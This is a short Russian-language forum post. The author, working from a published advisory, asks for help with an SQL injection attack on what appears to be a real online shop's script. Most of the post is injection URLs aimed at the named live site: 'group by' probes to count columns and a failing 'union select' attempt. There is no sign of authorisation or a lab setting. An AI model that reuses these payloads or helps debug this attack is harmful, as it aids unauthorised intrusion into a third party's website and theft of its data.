Столкнулся с такой проблемкой, мб поможете... Начнем с начала
Описание уязвимости - http://www.securitylab.ru/vulnerability/312412.php
Нашол бажный скрипт - http://viscali.com/shop/main_bigware_53.php
Начал подбирать кол-во полей:
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+1/* - нет ошибки
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+2/* - ошибка
Исходя из этого сделал вывод что столбец у нас один.
Далее http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+union+select+1/*
Выдает ошибку... Почему, ведь количество столбцов верное?